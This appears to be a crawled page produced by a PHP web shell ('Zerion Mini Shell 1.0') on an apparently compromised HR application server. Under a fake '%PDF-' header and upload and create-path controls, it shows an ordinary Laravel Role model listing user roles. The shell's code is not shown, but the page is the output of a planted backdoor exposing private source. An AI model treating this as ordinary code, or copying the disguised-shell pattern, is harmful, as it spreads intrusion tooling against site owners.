%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/hrsys/api/app/Models/
Upload File :
Create Path :
Current File : /var/www/html/hrsys/api/app/Models/Role.php

<?php

namespace App\Models;


/**
 * @property integer id
 * @property string name
 */
class Role extends \Spatie\Permission\Models\Role
{
    const ADMIN = 'ADMIN';
    const HR = 'HR';
    const FINANCE = 'FINANCE';
    const MANAGER = 'MANAGER';
    const USER = 'USER';
}

Zerion Mini Shell 1.0